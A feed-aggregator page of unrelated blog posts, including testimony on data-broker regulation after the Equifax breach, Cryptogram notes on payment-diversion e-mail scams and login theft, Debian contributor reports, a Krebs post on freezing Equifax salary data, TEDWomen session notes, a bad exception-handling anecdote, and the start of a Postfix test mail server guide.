The breadth and depth of information that data brokers have is astonishing. Data brokers collect and store billions of data elements covering nearly every US consumer. Just one of the data brokers studied holds information on more than 1.4 billion consumer transactions and 700 billion data elements, and another adds more than 3 billion new data points to its database each month.

These brokers collect demographic information: names, addresses, telephone numbers, e-mail addresses, gender, age, marital status, presence and ages of children in household, education level, profession, income level, political affiliation, cars driven, and information about homes and other property. They collect lists of things we've purchased, when we've purchased them, and how we paid for them. They keep track of deaths, divorces, and diseases in our families. They collect everything about what we do on the Internet.

4. These data brokers deliberately hide their actions, and make it difficult for consumers to learn about or control their data.

If there were a dozen people who stood behind us and took notes of everything we purchased, read, searched for, or said, we would be alarmed at the privacy invasion. But because these companies operate in secret, inside our browsers and financial transactions, we don't see them and we don't know they're there.

Regarding Equifax, few consumers have any idea what the company knows about them, who they sell personal data to or why. If anyone knows about them at all, it's about their business as a credit bureau, not their business as a data broker. Their website lists 57 different offerings for business: products for industries like automotive, education, health care, insurance, and restaurants.

In general, options to "opt-out" don't work with data brokers. It's a confusing process, and doesn't result in your data being deleted. Data brokers will still collect data about consumers who opt out. It will still be in those companies' databases, and will still be vulnerable. It just won't be included individually when they sell data to their customers.

5. The existing regulatory structure is inadequate.

Right now, there is no way for consumers to protect themselves. Their data has been harvested and analyzed by these companies without their knowledge or consent. They cannot improve the security of their personal data, and have no control over how vulnerable it is. They only learn about data breaches when the companies announce them -- which can be months after the breaches occur -- and at that point the onus is on them to obtain credit monitoring services or credit freezes. And even those only protect consumers from some of the harms, and only those suffered after Equifax admitted to the breach.

Right now, the press is reporting "dozens" of lawsuits against Equifax from shareholders, consumers, and banks. Massachusetts has sued Equifax for violating state consumer protection and privacy laws. Other states may follow suit.

If any of these plaintiffs win in the court, it will be a rare victory for victims of privacy breaches against the companies that have our personal information. Current law is too narrowly focused on people who have suffered financial losses directly traceable to a specific breach. Proving this is difficult. If you are the victim of identity theft in the next month, is it because of Equifax or does the blame belong to another of the thousands of companies who have your personal data? As long as one can't prove it one way or the other, data brokers remain blameless and liability free.

Additionally, much of this market in our personal data falls outside the protections of the Fair Credit Reporting Act. And in order for the Federal Trade Commission to levy a fine against Equifax, it needs to have a consent order and then a subsequent violation. Any fines will be limited to credit information, which is a small portion of the enormous amount of information these companies know about us. In reality, this is not an effective enforcement regime.

Although the FTC is investigating Equifax, it is unclear if it has a viable case.

6. The market cannot fix this because we are not the customers of data brokers.

The customers of these companies are people and organizations who want to buy information: banks looking to lend you money, landlords deciding whether to rent you an apartment, employers deciding whether to hire you, companies trying to figure out whether you'd be a profitable customer -- everyone who wants to sell you something, even governments.

Markets work because buyers choose from a choice of sellers, and sellers compete for buyers. None of us are Equifax's customers. None of us are the customers of any of these data brokers. We can't refuse to do business with the companies. We can't remove our data from their databases. With few limited exceptions, we can't even see what data these companies have about us or correct any mistakes.

We are the product that these companies sell to their customers: those who want to use our personal information to understand us, categorize us, make decisions about us, and persuade us.

Worse, the financial markets reward bad security. Given the choice between increasing their cybersecurity budget by 5%, or saving that money and taking the chance, a rational CEO chooses to save the money. Wall Street rewards those whose balance sheets look good, not those who are secure. And if senior management gets unlucky and a public breach happens, they end up okay. Equifax's CEO didn't get his $5.2 million severance pay, but he did keep his $18.4 million pension. Any company that spends more on security than absolutely necessary is immediately penalized by shareholders when its profits decrease.

Even the negative PR that Equifax is currently suffering will fade. Unless we expect data brokers to put public interest ahead of profits, the security of this industry will never improve without government regulation.

7. We need effective regulation of data brokers.

In 2014, the Federal Trade Commission recommended that Congress require data brokers be more transparent and give consumers more control over their personal information. That report contains good suggestions on how to regulate this industry.

First, Congress should help plaintiffs in data breach cases by authorizing and funding empirical research on the harm individuals receive from these breaches.

Specifically, Congress should move forward legislative proposals that establish a nationwide "credit freeze" -- which is better described as changing the default for disclosure from opt-out to opt-in -- and free lifetime credit monitoring services. By this I do not mean giving customers free credit-freeze options, a proposal by Senators Warren and Schatz, but that the default should be a credit freeze.

The credit card industry routinely notifies consumers when there are suspicious charges. It is obvious that credit reporting agencies should have a similar obligation to notify consumers when there is suspicious activity concerning their credit report.

On the technology side, more could be done to limit the amount of personal data companies are allowed to collect. Increasingly, privacy safeguards impose "data minimization" requirements to ensure that only the data that is actually needed is collected. On the other hand, Congress should not create a new national identifier to replace the Social Security Numbers. That would make the system of identification even more brittle. Better is to reduce dependence on systems of identification and to create contextual identification where necessary.

Finally, Congress needs to give the Federal Trade Commission the authority to set minimum security standards for data brokers and to give consumers more control over their personal information. This is essential as long as consumers are these companies' products and not their customers.

8. Resist complaints from the industry that this is "too hard."

The credit bureaus and data brokers, and their lobbyists and trade-association representatives, will claim that many of these measures are too hard. They're not telling you the truth.

Take one example: credit freezes. This is an effective security measure that protects consumers, but the process of getting one and of temporarily unfreezing credit is made deliberately onerous by the credit bureaus. Why isn't there a smartphone app that alerts me when someone wants to access my credit rating, and lets me freeze and unfreeze my credit at the touch of the screen? Too hard? Today, you can have an app on your phone that does something similar if you try to log into a computer network, or if someone tries to use your credit card at a physical location different from where you are.

Moreover, any credit bureau or data broker operating in Europe is already obligated to follow the more rigorous EU privacy laws. The EU General Data Protection Regulation will come into force, requiring even more security and privacy controls for companies collecting and storing the personal data of EU citizens. Those companies have already demonstrated that they can comply with those more stringent regulations.

Credit bureaus, and data brokers in general, are deliberately not implementing these 21st-century security solutions, because they want their services to be as easy and useful as possible for their actual customers: those who are buying your information. Similarly, companies that use this personal information to open accounts are not implementing more stringent security because they want their services to be as easy-to-use and convenient as possible.

9. This has foreign trade implications.

The Canadian Broadcast Corporation reported that 100,000 Canadians had their data stolen in the Equifax breach. The British Broadcasting Corporation originally reported that 400,000 UK consumers were affected; Equifax has since revised that to 15.2 million.

Many American Internet companies have significant numbers of European users and customers, and rely on negotiated safe harbor agreements to legally collect and store personal data of EU citizens.

The European Union is in the middle of a massive regulatory shift in its privacy laws, and those agreements are coming under renewed scrutiny. Breaches such as Equifax give these European regulators a powerful argument that US privacy regulations are inadequate to protect their citizens' data, and that they should require that data to remain in Europe. This could significantly harm American Internet companies.

10. This has national security implications.

Although it is still unknown who compromised the Equifax database, it could easily have been a foreign adversary that routinely attacks the servers of US companies and US federal agencies with the goal of exploiting security vulnerabilities and obtaining personal data.

When the Fair Credit Reporting Act was passed in 1970, the concern was that the credit bureaus might misuse our data. That is still a concern, but the world has changed since then. Credit bureaus and data brokers have far more intimate data about all of us. And it is valuable not only to companies wanting to advertise to us, but foreign governments as well. In 2015, the Chinese breached the database of the Office of Personnel Management and stole the detailed security clearance information of 21 million Americans. North Korea routinely engages in cybercrime as a way to fund its other activities. In a world where foreign governments use cyber capabilities to attack US assets, requiring data brokers to limit collection of personal data, securely store the data they collect, and delete data about consumers when it is no longer needed is a matter of national security.

11. We need to do something about it.

Yes, this breach is a huge black eye and a temporary stock dip for Equifax -- this month. Soon, another company will have suffered a massive data breach and few will remember Equifax's problem. Does anyone remember last year when Yahoo admitted that it exposed personal information of a billion users in 2013 and another half billion in 2014?

Unless Congress acts to protect consumer information in the digital age, these breaches will continue.

Thank you for the opportunity to testify today. I will be pleased to answer your questions.


Planet DebianSteve Kemp: Paternity-leave is half-over

I'm taking the month of November off work, so that I can exclusively take care of our child. Despite it being a difficult time, with him teething, it has been a great half-month so far.

During the course of the month I've found my interest in a lot of technological things waning, so I've killed my account(s) on a few platforms, and scaled back others - if I could exclusively do child-care for the next 20 years I'd be very happy, but sadly I don't think that is terribly realistic.

My interest in things hasn't entirely vanished though, to the extent that I found the time to replace my use of etcd with consul yesterday, and I'm trying to work out how to simplify my hosting setup. Right now I have a bunch of servers doing two kinds of web-hosting:

Hosting static sites is trivial, whether with a virtual machine, via Amazon's S3 service, or some other static host such as netlify.

Hosting for "dynamic stuff" is harder. These days a trend for "serverless" deployments allows you to react to events and be dynamic, but not everything can be a short-lived piece of ruby/javascript/lambda. It feels like I could set up a generic platform for launching containers, or otherwise modernising FastCGI, etc, but I'm not sure what the point would be. (I'd still be the person maintaining it, and it'd still be a hassle. I've zero interest in selling things to people, as that only means more support.)

In short I have a bunch of servers, they mostly tick over unattended, but I'm not really sure I want to keep them running for the next 10+ years. Over time our child will deserve, demand, and require more attention which means time for personal stuff is only going to diminish.

Simplifying things now wouldn't be a bad thing to do, before it is too late.

CryptogramCybercriminals Infiltrating E-Mail Networks to Divert Large Customer Payments

There's a new criminal tactic involving hacking an e-mail account of a company that handles high-value transactions and diverting payments. Here it is in real estate:

The scam generally works like this: Hackers find an opening into a title company's or realty agent's email account, track upcoming home purchases scheduled for settlements -- the pricier the better -- then assume the identity of the title agency person handling the transaction.

Days or sometimes weeks before the settlement, the scammer poses as the title or escrow agent whose email accounts they've hijacked and instructs the home buyer to wire the funds needed to close -- often hundreds of thousands of dollars, sometimes far more -- to the criminals' own bank accounts, not the title or escrow company's legitimate accounts. The criminals then withdraw the money and vanish.

Here it is in fine art:

The fraud is relatively simple. Criminals hack into an art dealer's email account and monitor incoming and outgoing correspondence. When the gallery sends a PDF invoice to a client via email following a sale, the conversation is hijacked. Posing as the gallery, hackers send a duplicate, fraudulent invoice from the same gallery email address, with an accompanying message instructing the client to disregard the first invoice and instead wire payment to the account listed in the fraudulent document.

Once money has been transferred to the criminals' account, the hackers move the money to avoid detection and then disappear. The same technique is used to intercept payments made by galleries to their artists and others. Because the hackers gain access to the gallery's email contacts, the scam can spread quickly, with fraudulent emails appearing to come from known sources.

I'm sure it's happening in other industries as well, probably even with business-to-business commerce.

EDITED TO ADD (11/14): Brian Krebs wrote about this in 2014.

Planet DebianMarkus Koschany: My Free Software Activities in October 2017

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • I packaged a new upstream version of springlobby. There is even a more recent one now, but I discovered that it would fail to build from source. I reported the issue and now I am waiting for another release.
  • These packages were also updated: bullet, tuxfootball (#876481), berusky (#877979), spring, hitori and trackballs.
  • I released a new version of cube2-data, a DFSG-free version of the Sauerbraten game. This release was largely made possible thanks to the work of Nyav.
  • I prepared two stable point releases of berusky and simutrans to fix #877979 and #869029 for users of Debian’s stable distributions too. The bug in Berusky is already resolved but I’m still waiting for the confirmation to upload simutrans (#878668).
  • I updated wing and biniax2. Here I discovered that biniax2 would segfault immediately at startup after recompilation. I tracked down the issue to some C code that caused undefined behavior, prepared a patch and released a fixed revision.
  • I sponsored a new upstream version of mupen64plus-qt.

Debian Java

  • This month I started to work on fixing Java 9 bugs since Java 9 shall become the new default JDK/JRE for Buster. The bug reports were filed by Chris West who did the important work of identifying build failures and broken packages. I started with some low-hanging fruit first and the following packages are now Java 9 ready: libgetopt-java, libjide-oss-java, activemq-protobuf, antelope, yecht, slashtime, colorpicker, f2j, libreadline-java, libjaxp1.3-java, jlapack, isorelax, libisrt-java, rxtx, uima-addons.
  • New upstream releases this month: apktool, jboss-xnio, okio, pdfsam, libsejda-java, bcel, autocomplete, mediathekview, sweethome3d.
  • MediathekView introduced yet another build-dependency. Let’s welcome libokhttp-java in Debian.
  • I upgraded jackson-databind to fix CVE-2017-7525. While I was at it, I continued this work with jackson-core, jackson-annotations, jackson-dataformat-xml, jackson-jr, jackson-datatype-joda, jackson-module-jaxb-annotations, jackson-dataformat-cbor, jackson-dataformat-smile, jackson-dataformat-yaml and jackson-jaxrs-providers. I also requested the removal of jackson-datatype-guava.
  • More resolved RC issues: commons-io (#873118), tycho (#879250)
  • Package updates: mockobjects (converted from CDBS to DH) and jblas (RC #877225, #873212, #698176)
  • The Maven 2 to Maven 3 transition caused (and still causes) a lot of fallout: I investigated the following packages with RC bugs. In most cases the issue was in another package, so the bugs could be closed, but there were also packages like conversant-disruptor (#869002) which caused build failures unrelated to the transition. In total 15 packages were triaged or fixed: jasypt (#871195), mustache-java (#869009), libslf4j-java, apache-log4j2, conversant-disruptor, powermock (#869017), jetty9 (#869021), maven-site-plugin (#869001), javamail (#871102), assertj-core (#871131), java-allocation-instrumenter (#869251), json-smart (#868603), sisu-guice (#868611), maven-archiver (#871069), doxia-sitetools (#875948)
  • I have started to work on a new upstream version of triplea, multiple strategy games written in Java. The update would fix a couple of bugs and make the package ready for Java 9.
  • It was also requested to upgrade Gradle to version 3.4.1 at least. I have made good progress but there is more work to do.

Debian LTS

This was my twentieth month as a paid contributor and I have been paid to work 19 hours on Debian LTS, a project started by Raphaël Hertzog. I will catch up with the remaining 1.75 hours in November. In that time I did the following:

  • From 30 October to 5 November I was in charge of our LTS frontdesk. I triaged bugs in jasperreports, jbossas4, libstruts1.2-java, httpcomponents-client, vim, emacs23, trafficserver, async-http-client, liblouis, wordpress, apr, apr-utils, redis, nautilus, libpam4j and spip.
  • I decided to mark jbossas4 as end-of-life because the Java application server was never fully packaged and the version in Wheezy is already nine years old. I investigated the open security issues in jasperreports and contacted upstream but they have not published any details yet.
  • I pinged bug #878088. The reportbug maintainer still has to respond to the idea of informing the security teams when users report bugs in security uploads. I will discuss the possibility with the rest of the team, whether it is helpful to patch reportbug in Wheezy/Jessie/Stretch now.
  • DLA-1151-1 and DLA-1160-1. Issued two security updates for WordPress addressing 10 CVEs. It was later discovered that the patch for CVE-2017-14990 was incomplete and caused a regression when using WordPress’ multi-site feature. Single-site installations were not affected. The complete fix would either include a database upgrade or a different approach without using the new database field “signup_id”. I reverted the patch for now and issued a regression update in DLA-1151-2.
  • DLA-1158-1. Issued a security update for bchunk fixing 3 CVEs.
  • DLA-1159-1. Issued a security update for graphicsmagick fixing 2 CVEs.
  • DLA-1164-1. Issued a security update for mupdf fixing 2 CVEs.
  • DLA-1165-1. Issued a security update for libpam4j fixing 1 CVE.
  • DLA-1167-1. Issued a security update for ruby-yajl fixing 1 CVE.
  • DLA-1157-1. I uploaded a security update for openssl. The update was prepared by Kurt Roeckx, the maintainer of openssl.

Misc

  • I prepared the security updates for libpam4j (DSA-4025-1) and bchunk (DSA-4026-1) and fixed the same issues in Sid and Buster.

Thanks for reading and see you next time.

Krebs on SecurityHow to Opt Out of Equifax Revealing Your Salary History

A KrebsOnSecurity series on how easy big-three credit bureau Equifax makes it to get detailed salary history data on tens of millions of Americans apparently inspired a deeper dive on the subject by Fast Company, which examined how this Equifax division has been one of the company’s best investments. In this post, I’ll show you how to opt out of yet another Equifax service that makes money at the expense of your privacy.

My original report showed how the salary history for tens of millions of employees at some of the world’s largest corporations was available to anyone armed with an employee’s Social Security number and date of birth — information that was stolen on 145.5 million Americans in the recent breach at Equifax.

Equifax took down their salary portal — a service from the company’s Workforce Solutions division known as The Work Number (formerly “TALX”) — just a few hours after my story went live on Oct. 8. The company explained that the site was being disabled for routine maintenance, but Equifax didn’t fully reopen the portal until Nov. 2, following the addition of unspecified “security improvements.”

Fast Company writer Joel Winston’s story examines how some 70,000 companies — including Amazon, AT&T, Facebook, Microsoft, Oracle, Twitter and Wal-Mart — actually pay Equifax to collect, organize, and re-sell their employees’ personal income information and work history.

“A typical employee at Facebook (which also owns Instagram and WhatsApp) may require verification of his employment through TALX when he leases an apartment, updates his immigration status, applies for a loan or public aid, or applies for a new job,” Winston writes. “If his new prospective employer is among the 70,000 approved entities in Equifax’s verifier network with a ‘permissible purpose,’ that company can purchase his employment and income information for about $20.”

While this may sound like a nice and legitimate use of salary data, the point of my original report was that this salary data is also available to anyone who has the Social Security number and date of birth on virtually any person who once worked at a company that uses this Equifax service.

In May 2017, KrebsOnSecurity broke the story of how this same Equifax Workforce portal was abused for an entire year by identity thieves involved in tax refund fraud with the Internal Revenue Service. Fraudsters used SSN and DOB data to reset the 4-digit PINs given to customer employees as a password, and then steal W-2 tax data after successfully answering personal questions about those employees.

Curiously, Equifax claims they have no evidence that anyone was harmed as a result of the year-long pattern of tax fraud related to how easy it was to coax salary and payroll data out of its systems.

“We do not know of any specific fraud incidents linked with the Work Number,” Equifax spokeswoman Marisa Salcines told Fast Company.

This statement sounds suspiciously like what big-three credit bureau Experian told lawmakers in 2014 after they were hauled up to Capitol Hill to explain another breach that was scooped by KrebsOnSecurity: That a Vietnamese man who ran an identity theft service which catered to tax refund fraudsters had access for nine months to more than 200 million consumer records maintained by Experian.

Experian’s suits told lawmakers that no consumers were harmed even as the U.S. Secret Service was busy arresting customers of this identity theft service — nearly all of whom were involved in tax refund fraud and other forms of consumer ID theft.

Loyal readers here will know I have long urged consumers to opt out of letting the big credit bureaus resell their credit file to potential lenders (and, by proxy, to ID thieves), by placing a freeze on their credit files with Equifax, Experian, Trans Union and Innovis.

In the wake of the Equifax breach, one thing I’ve heard from so many readers that was a big factor in their decision to finally freeze their credit was that the bureaus would no longer be able to profit by selling their credit files.

As it happens, it is possible to opt out of having your salary data sold through Equifax. According to Equifax, this involves placing a free “freeze” on your file with the Work Number. These instructions on how to do that come verbatim from Equifax:

To place a security freeze on your The Work Number employment report, send
your request via mail to:

TALX Corporation
ATTN: Employment Data Report Dept 19-10
11432 Lackland Road
St. Louis, Missouri 63146

Or, you may contact us on the web at http://www.theworknumber.com or call 800-996-7566.

It’s not clear what may be the potential consequences of freezing your file with The Work Number. Fast Company explains the service and its giant database “helps streamline various processes for employers and other agencies, and it helps employees too, Equifax wrote in an emailed statement. The Work Number provides prospective landlords a way to verify an applicant’s income, for instance, or makes it cheaper for human resources departments to examine an applicant’s background.”

Here’s Equifax explaining why consumers might want to leave their files alone:

“Without the Work Number, a lender, property manager or pre-employment screener will call an employer and explain why they need to check on an employee or former employee’s employment or income. That individual has no control over who picks up the phone, whether the right information is actually given out, or if his or her privacy will be respected.”

Neither does the consumer have any control over to whom Equifax gives this data. I for one am taking my chances and freezing my salary data at Equifax. I’ll let you know how it goes.

Before you opt out, you may wish to see which lenders, credit agencies and other entities may have received or attempted to pull your Work Number salary history.

To request a free Employment Data Report, you’ll need to fill out a form at the Work Number website, or make a request by mail, or through a toll-free phone number (1-866-222-5880).

Planet DebianBen Hutchings: Debian LTS work, October 2017

I was assigned 15 hours of work by Freexian's Debian LTS initiative and carried over 9 hours from September. I worked 20 hours and will carry over 4 hours to the next month.

I prepared and uploaded an update to dnsmasq to fix some urgent security issues. I issued DLA-1124-1 for this update.

I prepared and released another update on the Linux 3.2 longterm stable branch (3.2.94) and I began preparing the next update, but I didn't upload an update to Debian.

TEDBreathe and push: Notes from Session 6: Rebuild

Leah Chase is 94 years old and she spent the morning, as she always does, cooking at her restaurant. She brings lessons from a life of activism and speaking up (and cooking) to the stage at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

We’ve spent the past few days together thinking on big ideas, hard problems and new visions for what the world might be. What will tie it all together? This session on rebuilding — on facing tough questions and finding the inner (and exterior) resources we need to move forward.

Embrace your emotional truth. How we deal with our inner world drives everything, says psychologist Susan David. Every aspect of how we love, how we live, parent and lead is influenced by our emotional agility, how well we approach our emotions with curiosity, courage and compassion. But we need to strip away the toxic rigidity of categorizing emotions as overwhelmingly good or bad, pushing away the “bad” ones or pretending they don’t exist. And in our society, we’ve adopted a damaging mentality of forcing positivity as a new form of moral correctness. “It’s tyranny of positivity, and it’s cruel, unkind and ineffective,” says David. “We do it to ourselves and we do it to others.” This systematic avoidance and invalidation of our true feelings doesn’t equip us to deal with the world as it is. Yet, how do we conquer something so daunting and painful? David suggests that when you feel a strong feeling, you not immediately run for the emotional exits. When she was struggling, journaling provided a way to work through feelings in a healthy and ultimately life-changing way. Tough emotions are a part of our contract with life, she says. It’s up to us to handle them and ourselves with mercy and grace.

It starts with talking — and eating — together. By the time she took the stage by storm, the Queen of Creole Cuisine, Leah Chase, had already started cooking the lunch at her famous restaurant Dooky Chase. Though 94 years old, the activist and restaurateur radiates more life than an eager child, talking about the incredible group of people she has met throughout her life. She laughs at her children for asking her not to be political and proudly states, “You have to be political today. You have to be involved. You have to be part of the system. Look how it was when we couldn’t be a part of the system.” Chase knows too well the progress that has been made for women just in her lifetime — and how much more there is to do. In the midst of the civil rights movement, Dooky Chase served as a space where white and black people came together, where activists planned protests, and where the police entered but did not disturb. To her, it begins with talking, with sitting next to each other and discussing differences and commonalities. Still bustling today, Dooky Chase represents more than a place where people eat: It is symbolic of political transformation as it has “changed the course of America over gumbo and some fried chicken.” And, just in case anyone is concerned that she will retire anytime soon, Chase assures us that so long as she’s living, she will also be doing.

Musimbi Kanyoro is head of the Global Fund for Women, funneling money worldwide into making lives better. Photo: Ryan Lash / TED

Promoting equal generosity. Like so many of the speakers who’ve stood on the TED Women stage this week, Musimbi Kanyoro is the child of a dynamo. Says Kanyoro of her mother, who lived in a farming village in western Kenya: “she was a little bit like Melinda Gates, but with a lot less money.” Her mother supported the education of scores of children and organized the community, especially the women, to solve problems. She embodied isirika, a Maragoli word that means “caring, together, for one another” or “equal generosity.” Today Kanyoro practices isirika on a much larger scale as president and CEO of the Global Fund for Women, one of the world’s leading foundations for gender equality. There are a few principles of isirika that she encourages people to follow: embrace and recognize each other’s common humanity; value each person’s ideas, skills and contributions, no matter how small; those who possess more also enjoy the privilege to give more. “What would happen if we made isirika into our default?” Kanyoro wonders. “What could we achieve for each other? For humanity?” Let’s find out — together.

Deanna Van Buren speaks at TEDWomen 2017 — Bridges, November 1-3, 2017, Orpheum Theatre, New Orleans, Louisiana. Photo: Ryan Lash / TED

Building spaces for justice. The day a 5-year-old Deanna Van Buren was sent home for punching the boy who called her the N-word, she also designed her first healing space. That forest refuge built out of foliage, righteous fury and her mom’s blankets was the first step on a path to architecture school and — following a revelatory visit to a bleak Pennsylvania prison — her current calling designing restorative justice centers. Restorative justice, Deanna explains, is an alternative system that treats crime as a “breach of relationships,” in which “all stakeholders come together to repair the breach.” Prisons and courthouses, on the other hand, are designed for the punitive approach favored by a justice system focused on mass incarceration. With help and ideas from incarcerated men and women as well as from organizations like the Center for Court Innovation, Deanna designed replacements for these unforgiving institutions via restorative justice and economics centers like Restore Oakland, peacemaking spaces in schools, and mobile villages that bring resources to under-resourced communities. These dynamic spaces provide safe venues for dialogue, healing and reconciliation; employment and job training; and social services to help keep people from entering the justice system in the first place. Invoking Cornel West’s belief that “Justice is what love looks like in public,” Deanna concludes by envisioning a future without prisons and by asking a final question: “What would a restorative justice city look like?”

Poet Sunni Patterson and dancer Chanice Holmes perform at TEDWomen 2017 in New Orleans. Photo: Ryan Lash / TED

They wanted her / but if they knew her. In an inferno of words and accompanied by the entrancing moves of dancer Chanice Holmes, poet Sunni Patterson sets the TEDWomen stage ablaze with a magicked ode to Black women, wild and untamed despite conscious (and failed) attempts to subdue them. “This winding Niger river of a woman / one who is unafraid to tear away / only to roam and then become the wind,” recites Patterson. “She who speaks in gusts and cyclones / blasting us back to high ground, high consciousness / she turns and so does the world.”

Anjali Kumar is a “none” — a person with no professed religion, but lots of questions. She explored them onstage at TEDWomen 2017. Photo: Stacie McChesney / TED

A failed mission to find God. Sometimes a journey of discovery reveals truths we did not expect to find. More than 50 million people in the United States identify themselves as “none,” or not affiliated with a particular religion, but author and attorney Anjali Kumar found that most believe that there is a God, “We’re just not sure who it is.” With that in mind, Kumar went on a mission to define her own version of spirituality. Eschewing “big box” religions, Kumar spent time with witches in New York, a shaman in Peru and even placed a call to God from Burning Man, but it wasn’t until word spread of her planned trip to see an infamous “healer” in Brazil that she made a truly remarkable discovery about humankind. Kumar’s inbox was flooded with requests from friends and strangers, asking her to make requests on their behalf. Despite the diversity of people behind the requests, they generally agreed on what they wanted: good health, happiness and love. So although people may identify themselves with a multitude of identities or even as a “none,” Kumar found that when faced with any version of God, how we differ is less important than how we are the same.

Secrets of the Great Migration. Journalist and author of The Warmth of Other Suns Isabel Wilkerson tells the story of the Great Migration, the outpouring of 6 million African Americans from the Jim Crow South to cities in the North and West, between World War I and the 1970s. “This was the first time in American history that American citizens had to flee the land of their birth just to be recognized as the citizens that they had always been,” she says. It was also the first time in American history that the lowest caste people signaled they had options and were willing to take them, and the first time they had a chance to choose for themselves what they would do with their innate talents. “These people, by their actions, were able to do what the powers that be, North and South, could not or would not do,” she says, “They freed themselves.”

Isabel Wilkerson explores the greatest hidden story of the 20th century — the Great Migration of African Americans to cities of the north for work, safety and escape from Jim Crow. Photo: Stacie McChesney / TED

Revolutionary love is the call of our times. “If you cringe when people say love is the answer — I do too. I’m a lawyer.” Valarie Kaur closes the TEDWomen conference with a blockbuster talk about the revolutionary power of love, the “sweet labor” of actively working to make the world better, to hear each others’ stories, to help us see no one as a stranger. This struggle became personal to her when she gave birth to a son “in a time white nationalists call their great awakening, when far right-wing movements are on the rise around the globe, when hate crimes against Muslims and Sikhs are the highest they have been since 9/11. My son is growing up a little brown boy in a nation more dangerous for him than the one I was given. I will not be able to protect him when others see his body as a terrorist.” How can we begin to live in this world, how can we find the strength to make change? Do like the midwife says: Breathe. Then … push.

Valarie Kaur asks us to re-imagine the power of love at TEDWomen 2017. Photo: Ryan Lash / TED

CryptogramGoogle's Data on Login Thefts

This is interesting research and data:

With Google accounts as a case-study, we teamed up with the University of California, Berkeley to better understand how hijackers attempt to take over accounts in the wild. From March 2016 to March 2017, we analyzed several black markets to see how hijackers steal passwords and other sensitive data.

[...]

Our research tracked several black markets that traded third-party password breaches, as well as 25,000 blackhat tools used for phishing and keylogging. In total, these sources helped us identify 788,000 credentials stolen via keyloggers, 12 million credentials stolen via phishing, and 3.3 billion credentials exposed by third-party breaches.

The report.

Worse Than FailureRepresentative Line: An Exceptional Contract

The life of a contractor can be precarious. Contracts end, sometimes suddenly, and you rarely know what the organization you’re working for is actually like until it’s too late.

Ian S, for example, was contracting for a platform-as-a-service (PAAS) company, adding new features to their existing infrastructure automation system. It was the kind of place that had two copies of the same code-base, maintained side-by-side, just so that a single customer could use a script they’d written eight years prior.

That wasn’t too much of a challenge. The real challenge was that when things went wrong, there was almost no logging, and what little logging they got contained helpful, “[10:14:17] An error occurred” messages.

It wasn’t hard to see why that happened:

try {
    // Entry point to most of the program here
} catch (Exception e) {
    if ( e instanceof ProcessingException ) {
        throw new ProcessingException("An error occurred");
    } else if (e instanceof BatchException ) {
        throw new BatchException("An error occurred");
    } //… more types of exceptions
}

Ian describes this as “Pokemon Exception Handling”: you wrap the entire main method of your app in a single try, so you’re left with a single catch block that’s “gotta catch ’em all”. The use of instanceof is a nice touch, in the awfulness of it.
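As an added illustration that is not code from the article or from Ian's client, here is the catch-all from the story beside a handler that keeps the original exception chained as the cause and logs it with the failing batch, so the log carries more than “An error occurred”. The exception classes, the batch id and the malformed-record failure are all constructed for the demo.

```java
import java.util.logging.Level;
import java.util.logging.Logger;

// Hypothetical exception types standing in for the ones named in the story.
class ProcessingException extends Exception {
    ProcessingException(String message) { super(message); }
    ProcessingException(String message, Throwable cause) { super(message, cause); }
}

class BatchException extends Exception {
    BatchException(String message) { super(message); }
    BatchException(String message, Throwable cause) { super(message, cause); }
}

public class ExceptionContextDemo {
    private static final Logger LOG = Logger.getLogger(ExceptionContextDemo.class.getName());

    // Stand-in for the program's entry point: a constructed failure deep inside a batch run.
    static void runBatch(String batchId) throws ProcessingException, BatchException {
        try {
            Integer.parseInt("forty-two");  // constructed malformed record
        } catch (NumberFormatException e) {
            throw new ProcessingException("batch " + batchId + ": record 42 is malformed", e);
        }
    }

    // The pattern from the story: every exception is replaced by a fresh one,
    // so the message, cause and stack trace of the real failure are gone.
    static void pokemonHandler(String batchId) throws Exception {
        try {
            runBatch(batchId);
        } catch (Exception e) {
            if (e instanceof ProcessingException) {
                throw new ProcessingException("An error occurred");
            } else if (e instanceof BatchException) {
                throw new BatchException("An error occurred");
            }
            throw e;
        }
    }

    // Hardened form: catch the specific types, log the batch id together with the
    // full stack trace, and rethrow with the original exception chained as the cause.
    static void contextualHandler(String batchId) throws ProcessingException, BatchException {
        try {
            runBatch(batchId);
        } catch (ProcessingException e) {
            LOG.log(Level.SEVERE, "processing failed for batch " + batchId, e);
            throw new ProcessingException("processing failed for batch " + batchId, e);
        } catch (BatchException e) {
            LOG.log(Level.SEVERE, "batch " + batchId + " failed", e);
            throw new BatchException("batch " + batchId + " failed", e);
        }
    }

    // Walks the cause chain down to the exception that actually started the failure.
    static Throwable rootCause(Throwable t) {
        while (t.getCause() != null) {
            t = t.getCause();
        }
        return t;
    }

    public static void main(String[] args) {
        try {
            pokemonHandler("nightly-7");
        } catch (Exception e) {
            // The story's handler: neither the message nor the root cause says what broke.
            System.out.println("story's handler: " + e.getMessage()
                    + " / root cause: " + rootCause(e));
        }
        try {
            contextualHandler("nightly-7");
        } catch (Exception e) {
            // The hardened handler: batch id in the message, NumberFormatException as root cause.
            System.out.println("hardened handler: " + e.getMessage()
                    + " / root cause: " + rootCause(e));
        }
    }
}
```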

The developer responsible, John, was involved in a lot of important architectural decisions. For example, John decided “DevOps” and “Agile” meant that any code placed in the production branch needed to go to production, automatically. There were no checks around this, anyone with access to the main repo could merge-and-push.

“We enforce it by practice,” John explained. “We know that all of our developers, even the contractors, will follow the best practices.”

Late on Friday afternoon, John was working on making some configuration file changes. Among other things, his changes caused the whole program to crash on startup, but not before messing up some rows in the database. That was no problem, he was working on a branch, and running against a local dev environment.

In what John claimed was a “simple mistake”, he merged that branch with master. Then he pushed to the central repo. “It could happen to anyone,” he said. At 4:59PM, on Friday, their entire PAAS configuration and management suite went down. Garbage data was thrown into the database, repeatedly, and since the exception handling threw away every detail, the only information they had was “An error occurred.”

Truly, the life of a contractor is perilous, and for management, this became a 4-alarm, hair-on-fire emergency. All hands on deck! Even the contractors!

There was just one problem. The PAAS company had decided that they weren’t going to renew the contract. They had gone further, and announced that with a day’s notice, which left a number of the contractors flapping in the wind, between gigs, Ian included. So at 5:00PM, when he officially didn’t work there anymore, he wished John the best and went home.

Planet DebianFrançois Marier: Test mail server on Ubuntu and Debian

I wanted to setup a mail service on a staging server that would send all outgoing emails to a local mailbox. This avoids sending emails out to real users when running the staging server using production data.

First, install the postfix mail server:

apt install postfix

and choose the "Local only" mail server configuration type.

